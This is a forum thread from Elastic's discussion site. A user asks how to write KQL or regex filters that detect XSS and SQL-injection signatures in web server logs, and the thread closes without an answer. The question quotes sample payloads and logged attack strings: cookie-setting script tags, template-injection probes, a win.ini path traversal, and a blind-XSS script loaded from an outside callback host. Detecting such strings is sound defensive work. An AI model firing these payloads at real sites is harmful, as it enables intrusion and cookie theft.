# What is the best practice using KQL to filter desired attack signature over (web)logs?

**URL:** <https://discuss.elastic.co/t/what-is-the-best-practice-using-kql-to-filter-desired-attack-signature-over-web-logs/304371>\
**Category:** Elastic Security\
**Tags:** kql-kibana-query-language\
**Created:** [May 10, 2022, 3:36pm UTC](https://discuss.elastic.co/t/what-is-the-best-practice-using-kql-to-filter-desired-attack-signature-over-web-logs/304371 "2022-05-10T15:36:54Z")\
**Posts on this page:** 2\
**Page:** 1

<div class="post-metadata">

**Author:** ![Super\_Mario](https://avatars.discourse-cdn.com/v4/letter/s/5e9695/32.png) [@Super\_Mario](https://discuss.elastic.co/u/Super_Mario)\
**Post date:** [May 10, 2022, 3:36pm UTC](https://discuss.elastic.co/t/what-is-the-best-practice-using-kql-to-filter-desired-attack-signature-over-web-logs/304371/1 "2022-05-10T15:36:54Z")

</div>

Recently I'm experimenting with [logstach](https://www.elastic.co/logstash/) and Kibana on top of elastic over (web-)server logs. I tried to extract some attack signature like XSS & SQL injection like the following examples when logs contain `<` `$` `'` `"` `!` `.\` `%22`, and so on:

```auto
<script>foo</script> 
<script>document.cookie=%22testkzcp=XXX;%22</script> 
<meta%20http-equiv=Set-Cookie%20content=%22testvpmi=XXXX%22> 
${XXXXXXXXXX+5}.action  
'.print(md5(XXXXX)).' 
${@print(md5(XXXXX))}\ 
";print(md5(XXXXX));$a=" 
!(()&&!|*|*| 
.\.\.\.\.\.\.\.\.\.\/windows/win.ini 

```

The following is the common error I get when use `"(("`, `".\"`, `"OR"` or `"$"` and so on using KQL:

> KQLSyntaxError: Expected ":", "\<", "\<=", "\>", "\>=", AND, OR, end of input, whitespace but ")" found.

I checked [The Kibana Query Language (KQL)](https://www.elastic.co/guide/en/kibana/current/kuery-query.html#kuery-query) and tried to use `*` as [wildcard\_queries](https://www.elastic.co/guide/en/kibana/current/kuery-query.html#_wildcard_queries) beside of interesting term `"</script>"` or `"%22</script>"` through my desired timestamp but it was unsuccessful. I also checked [Escaping special characters in elasticsearch](https://stackoverflow.com/questions/40222694/escaping-special-characters-in-elasticsearch).

So The question is, What is the best practice for using KQL to filter/search desired string-based attack signature over logs. Please give an example for the above-mentioned attack signatures.

Edit1: I found the [post](https://stackoverflow.com/a/64998539/10452700) that says it's possible to solve this problem using Regex in KQL as well as some workaround [here](https://stackoverflow.com/questions/54352494/issues-with-regex-in-kibana) & [here](https://stackoverflow.com/questions/65207212/regular-expressions-in-elasticsearch-kibana), So I'm also interested in finding Regex-based solution to find the afore-mentioned pattern in KQL.

update1: pattern of web-request:

```auto
[21/Jan/2021:02:02:23 +0000] XX.XXX.XXX.X "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42109 "'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=074623&r=74172-18&h=74172-7bf88-2&"></script>" "'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=074623&r=74172-18&h=74172-7bf88-2&"></script>" - - TLSv1.2 -,-,-

```

```auto
[19/Jan/2021:23:02:37 +0000] XXX.XXX.XXX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42109 "-1" OR 2+190-190-1=0+0+0+1 --" "-1" OR 2+190-190-1=0+0+0+1 --" - - TLSv1.2 -,-,-

```

```auto
[10/Jan/2021:01:11:02 +0000] XXX.XXX.XX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42133 "${@print(md5(31337))}" "${@print(md5(31337))}" - - TLSv1.2 -,-,-

```

```auto
[18/Jan/2022:09:13:00 +0000] XXX.XXX.XX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42133 ")))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))" ")))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))" - - TLSv1.2 -,-,-

```

---

<div class="post-metadata">

**Author:** ![system](https://us1.discourse-cdn.com/elastic/original/3X/1/a/1ac57faf039f6b580b3f104ef42a2a89e41014de.png) [@system](https://discuss.elastic.co/u/system)\
**Post date:** [June 7, 2022, 3:37pm UTC](https://discuss.elastic.co/t/what-is-the-best-practice-using-kql-to-filter-desired-attack-signature-over-web-logs/304371/2 "2022-06-07T15:37:53Z")

</div>

This topic was automatically closed 28 days after the last reply. New replies are no longer allowed.
